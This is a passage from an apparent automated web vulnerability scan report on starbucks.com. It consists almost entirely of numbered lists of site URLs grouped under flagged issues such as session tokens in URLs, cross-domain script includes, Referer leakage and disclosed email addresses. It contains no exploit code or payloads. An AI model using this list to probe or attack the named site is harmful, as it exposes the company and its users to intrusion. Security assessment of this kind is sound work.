2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

2.269. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.270. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.271. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

2.272. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

2.273. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

2.274. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2.275. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

2.276. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

2.277. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

2.278. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

2.279. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

2.280. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

2.281. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.282. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

2.283. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.284. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

2.285. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

2.286. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

2.287. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.288. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.289. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

2.290. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

2.291. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

2.292. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

2.293. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.294. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.295. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.296. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.297. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

2.298. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

2.299. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

2.300. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

2.301. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

2.302. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

2.303. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

2.304. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

2.305. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

2.306. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

2.307. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

2.308. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

2.309. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

2.310. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

2.311. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

2.312. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

2.313. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

2.314. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

2.315. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

2.316. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

2.317. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

2.318. http://www.starbucks.com/search [keywords parameter]

2.319. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

2.320. http://www.starbucks.com/search/ [keywords parameter]

2.321. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

2.322. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

2.323. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

2.324. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

2.325. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

2.326. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

2.327. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

3. Session token in URL

3.1. http://www.starbucks.com/about-us

3.2. http://www.starbucks.com/about-us/company-information

3.3. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

3.4. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

3.5. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

3.6. http://www.starbucks.com/about-us/company-information/product-advisories

3.7. http://www.starbucks.com/about-us/our-heritage

3.8. http://www.starbucks.com/site-map

4. Flash cross-domain policy

5. Cross-domain Referer leakage

5.1. http://www.starbucks.com/menu/catalog/nutrition

5.2. http://www.starbucks.com/menu/catalog/nutrition

5.3. http://www.starbucks.com/menu/catalog/nutrition

5.4. http://www.starbucks.com/search

5.5. http://www.starbucks.com/search

6. Cross-domain script include

6.1. http://www.starbucks.com/

6.2. http://www.starbucks.com/about-us

6.3. http://www.starbucks.com/about-us/company-information

6.4. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

6.5. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

6.6. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

6.7. http://www.starbucks.com/about-us/company-information/product-advisories

6.8. http://www.starbucks.com/about-us/our-heritage

6.9. http://www.starbucks.com/business

6.10. http://www.starbucks.com/business/foodservice

6.11. http://www.starbucks.com/business/international-stores

6.12. http://www.starbucks.com/business/licensed-stores

6.13. http://www.starbucks.com/business/office-coffee

6.14. http://www.starbucks.com/career-center

6.15. http://www.starbucks.com/career-center/career-diversity

6.16. http://www.starbucks.com/career-center/career-diversity/partner-networks

6.17. http://www.starbucks.com/career-center/international-positions

6.18. http://www.starbucks.com/career-center/working-at-starbucks

6.19. http://www.starbucks.com/coffee

6.20. http://www.starbucks.com/coffee/learn

6.21. http://www.starbucks.com/coffee/learn/clover

6.22. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

6.23. http://www.starbucks.com/coffee/starbucks-natural-fusions

6.24. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

6.25. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

6.26. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

6.27. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

6.28. http://www.starbucks.com/coffee/starbucks-reserve-coffee

6.29. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

6.30. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

6.31. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java

6.32. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

6.33. http://www.starbucks.com/coffee/via

6.34. http://www.starbucks.com/coffee/via/flavored-coffee

6.35. http://www.starbucks.com/coffee/via/instant-coffee

6.36. http://www.starbucks.com/coffee/whole-bean-coffee

6.37. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

6.38. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific

6.39. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

6.40. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

6.41. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

6.42. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

6.43. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

6.44. http://www.starbucks.com/coffeehouse

6.45. http://www.starbucks.com/coffeehouse/community

6.46. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

6.47. http://www.starbucks.com/coffeehouse/entertainment

6.48. http://www.starbucks.com/coffeehouse/mobile-apps

6.49. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

6.50. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

6.51. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

6.52. http://www.starbucks.com/coffeehouse/store-design

6.53. http://www.starbucks.com/coffeehouse/wireless-internet

6.54. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

6.55. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

6.56. http://www.starbucks.com/customer-service

6.57. http://www.starbucks.com/customer-service/contact

6.58. http://www.starbucks.com/customer-service/faqs/card

6.59. http://www.starbucks.com/customer-service/faqs/coffee

6.60. http://www.starbucks.com/customer-service/faqs/coffeehouse

6.61. http://www.starbucks.com/customer-service/faqs/menu

6.62. http://www.starbucks.com/customer-service/faqs/responsibility

6.63. http://www.starbucks.com/customer-service/faqs/shop

6.64. http://www.starbucks.com/menu

6.65. http://www.starbucks.com/menu/catalog/nutrition

6.66. http://www.starbucks.com/menu/drinks

6.67. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

6.68. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha

6.69. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

6.70. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

6.71. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

6.72. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino

6.73. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

6.74. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

6.75. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

6.76. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

6.77. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day

6.78. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto

6.79. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee

6.80. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler

6.81. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast

6.82. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee

6.83. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast

6.84. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate

6.85. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate

6.86. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate

6.87. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate

6.88. http://www.starbucks.com/menu/drinks/espresso/caffe-americano

6.89. http://www.starbucks.com/menu/drinks/espresso/caffe-latte

6.90. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha

6.91. http://www.starbucks.com/menu/drinks/espresso/cappuccino

6.92. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte

6.93. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato

6.94. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte

6.95. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte

6.96. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna

6.97. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato

6.98. http://www.starbucks.com/menu/drinks/espresso/espresso-shot

6.99. http://www.starbucks.com/menu/drinks/espresso/flavored-latte

6.100. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte

6.101. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano

6.102. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte

6.103. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha

6.104. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato

6.105. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte

6.106. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte

6.107. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte

6.108. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha

6.109. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

6.110. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte

6.111. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte

6.112. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha

6.113. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha

6.114. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha

6.115. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha

6.116. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte

6.117. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato

6.118. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte

6.119. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte

6.120. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha

6.121. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha

6.122. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

6.123. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

6.124. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

6.125. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

6.126. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

6.127. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

6.128. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

6.129. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

6.130. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

6.131. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

6.132. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

6.133. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

6.134. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

6.135. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

6.136. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

6.137. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

6.138. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

6.139. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

6.140. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

6.141. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

6.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

6.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

6.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

6.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

6.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

6.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

6.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

6.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

6.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

6.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

6.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

6.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

6.154. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice

6.155. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice

6.156. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk

6.157. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk

6.158. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice

6.159. http://www.starbucks.com/menu/drinks/tazo-tea/awake

6.160. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte

6.161. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea

6.162. http://www.starbucks.com/menu/drinks/tazo-tea/calm

6.163. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte

6.164. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips

6.165. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey

6.166. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte

6.167. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte

6.168. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte

6.169. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte

6.170. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte

6.171. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom

6.172. http://www.starbucks.com/menu/drinks/tazo-tea/passion

6.173. http://www.starbucks.com/menu/drinks/tazo-tea/refresh

6.174. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

6.175. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea

6.176. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

6.177. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea

6.178. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

6.179. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

6.180. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte

6.181. http://www.starbucks.com/menu/drinks/tazo-tea/zen

6.182. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

6.183. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

6.184. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

6.185. http://www.starbucks.com/menu/food

6.186. http://www.starbucks.com/menu/food/bakery/8-grain-roll

6.187. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin

6.188. http://www.starbucks.com/menu/food/bakery/apple-fritter

6.189. http://www.starbucks.com/menu/food/bakery/asiago-bagel

6.190. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf

6.191. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut

6.192. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar

6.193. http://www.starbucks.com/menu/food/bakery/blueberry-scone

6.194. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin

6.195. http://www.starbucks.com/menu/food/bakery/butter-croissant

6.196. http://www.starbucks.com/menu/food/bakery/cheese-danish

6.197. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie

6.198. http://www.starbucks.com/menu/food/bakery/chocolate-croissant

6.199. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut

6.200. http://www.starbucks.com/menu/food/bakery/chonga-bagel

6.201. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone

6.202. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone

6.203. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie

6.204. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut

6.205. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll

6.206. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie

6.207. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel

6.208. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake

6.209. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin

6.210. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread

6.211. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone

6.212. http://www.starbucks.com/menu/food/bakery/marble-pound-cake

6.213. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar

6.214. http://www.starbucks.com/menu/food/bakery/morning-bun

6.215. http://www.starbucks.com/menu/food/bakery/multigrain-bagel

6.216. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut

6.217. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie

6.218. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone

6.219. http://www.starbucks.com/menu/food/bakery/plain-bagel

6.220. http://www.starbucks.com/menu/food/bakery/pumpkin-bread

6.221. http://www.starbucks.com/menu/food/bakery/raspberry-scone

6.222. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake

6.223. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

6.224. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

6.225. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake

6.226. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake

6.227. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie

6.228. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie

6.229. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake

6.230. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin

6.231. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

6.232. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

6.233. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate

6.234. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

6.235. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

6.236. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar

6.237. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit

6.238. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts

6.239. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

6.240. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

6.241. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal

6.242. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

6.243. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream

6.244. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream

6.245. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream

6.246. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream

6.247. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream

6.248. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream

6.249. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

6.250. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

6.251. http://www.starbucks.com/menu/food/salads/farmers-market-salad

6.252. http://www.starbucks.com/menu/food/salads/fruit-cup

6.253. http://www.starbucks.com/menu/food/salads/garden-pesto-salad

6.254. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad

6.255. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

6.256. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

6.257. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

6.258. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

6.259. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

6.260. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

6.261. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait

6.262. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait

6.263. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

6.264. http://www.starbucks.com/menu/nutrition

6.265. http://www.starbucks.com/menu/nutrition/20-under-200

6.266. http://www.starbucks.com/menu/nutrition/35-under-350

6.267. http://www.starbucks.com/responsibility

6.268. http://www.starbucks.com/responsibility/community

6.269. http://www.starbucks.com/responsibility/community/community-service

6.270. http://www.starbucks.com/responsibility/community/ethos-water-fund

6.271. http://www.starbucks.com/responsibility/community/starbucks-foundation

6.272. http://www.starbucks.com/responsibility/community/starbucks-red

6.273. http://www.starbucks.com/responsibility/community/youth-action

6.274. http://www.starbucks.com/responsibility/diversity

6.275. http://www.starbucks.com/responsibility/diversity/suppliers

6.276. http://www.starbucks.com/responsibility/environment

6.277. http://www.starbucks.com/responsibility/environment/climate-change

6.278. http://www.starbucks.com/responsibility/environment/energy

6.279. http://www.starbucks.com/responsibility/environment/explore-green-store

6.280. http://www.starbucks.com/responsibility/environment/green-building

6.281. http://www.starbucks.com/responsibility/environment/recycling

6.282. http://www.starbucks.com/responsibility/environment/water

6.283. http://www.starbucks.com/responsibility/learn-more/goals-and-progress

6.284. http://www.starbucks.com/responsibility/learn-more/policies

6.285. http://www.starbucks.com/responsibility/learn-more/relationships

6.286. http://www.starbucks.com/responsibility/learn-more/shared-values-blog

6.287. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet

6.288. http://www.starbucks.com/responsibility/sourcing

6.289. http://www.starbucks.com/responsibility/sourcing/cocoa

6.290. http://www.starbucks.com/responsibility/sourcing/coffee

6.291. http://www.starbucks.com/responsibility/sourcing/farmer-support

6.292. http://www.starbucks.com/responsibility/sourcing/store-products

6.293. http://www.starbucks.com/responsibility/sourcing/tea

6.294. http://www.starbucks.com/responsibility/wellness

6.295. http://www.starbucks.com/search

6.296. http://www.starbucks.com/site-map

6.297. http://www.starbucks.com/smooth

6.298. http://www.starbucks.com/store-locator

6.299. http://www.starbucks.com/whats-new

6.300. https://www.starbucks.com/card/set-auto-reload

7. Email addresses disclosed

7.1. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

7.2. http://www.starbucks.com/customer-service/faqs/card

7.3. http://www.starbucks.com/customer-service/faqs/coffeehouse

